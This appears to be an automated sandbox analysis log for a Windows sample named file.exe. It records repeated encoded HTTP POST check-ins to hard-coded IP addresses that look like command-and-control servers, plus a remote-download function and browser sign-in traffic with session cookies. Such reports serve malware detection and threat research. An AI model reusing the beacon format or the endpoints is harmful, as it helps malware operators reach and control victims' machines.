Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 52.153.155.231 52.153.155.231
Source: Joe Sandbox View	IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View	IP Address: 152.195.19.97 152.195.19.97

Source: Joe Sandbox View

ASN Name: GES-ASRU GES-ASRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76c0xx2-tCl3huF6R_uGDdkvCx33lS6VkP03GMJYqycbKU88ilI9jnwvjjmkhmcj4FKFUKtFA HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:w4RW8X79OLP1lhTG5U-kYT8yZKnSNw:3U3fE25Sj1rlD-N2
Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76ACXN3GLzFgo4vjAm8qgvaycSbBf1NyhfiU3jRSTe8QWkjhjdrOWS7DzX4mFMwn9Z_r8QQzQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S86286635%3A1722009435752789&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:yI_OEUMu7IGbnCDihcwlWJkLhxv6TQ:XPid9P2CWoLMw6di
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74EGyOtYhtIedH616HDdleWeyvx-W5gVjR9WtunrFrzD7YvzKdhr32YF_YLRBX-ZKofQnLR HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:LYHKDd3zseErEFB9_nba7XBg1Is9-w:UN_hHMbC-ffQw73q
